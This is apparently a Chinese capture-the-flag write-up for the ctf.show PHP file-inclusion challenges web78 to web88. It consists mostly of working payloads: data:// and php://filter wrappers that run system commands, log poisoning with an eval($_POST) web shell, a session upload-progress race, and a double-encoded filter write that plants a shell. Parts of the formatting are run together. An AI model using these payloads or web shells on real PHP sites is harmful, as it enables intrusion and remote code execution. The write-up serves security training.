web78
payload
/?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==[huayang]方法二
payload
/?file=php://filter/convert.base64-encode/resource=flag.phpweb79
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdubCBmbGFnLnBocCcpOw==web80—81
?file=/var/log/nginx/access.log发现可以查看日志,则使用日志包含
<?php eval($_POST[a]);?>
方法二
<?php system('ls');?>
<?php system(‘tac fl0g.php’);?>
web82—86
这题利用利用session.upload_progress进行文件包含
首先写个上传文件
注:记得改url
<!DOCTYPE html>
<html>
<body>
<form action="http://c1506ed9-d1e0-427c-8bb7-35fee4dccad6.chall.ctf.show/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>抓包,改包
PHPSESSID=flag<?php system('ls');?>
放入intruder
继续抓包
?file=/tmp/sess_flag
写个循环进行爆破
for i in range(100000):
print(i)
前面抓的那个和这个同时开始爆破
改一下继续
<?php system('cat fl0g.php');?>
web87
这题很像一个比赛的题
将 php://filter/write=convert.base64-decode/resource=123.php进行两次url编码
%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%34%25%36%35%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%33%32%25%33%33%25%32%45%25%37%30%25%36%38%25%37%30然后再content写入经过base64编码过后的一句话 (PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg==)
这里content的值前面要加两个字符,因为base64算法解码时是4个byte一组,所以给他增加2个字符 一共8个字符
也可以用蚁剑进行连接
web88
payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsg
[/huayang]
FROM:浅浅淡淡[hellohy]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论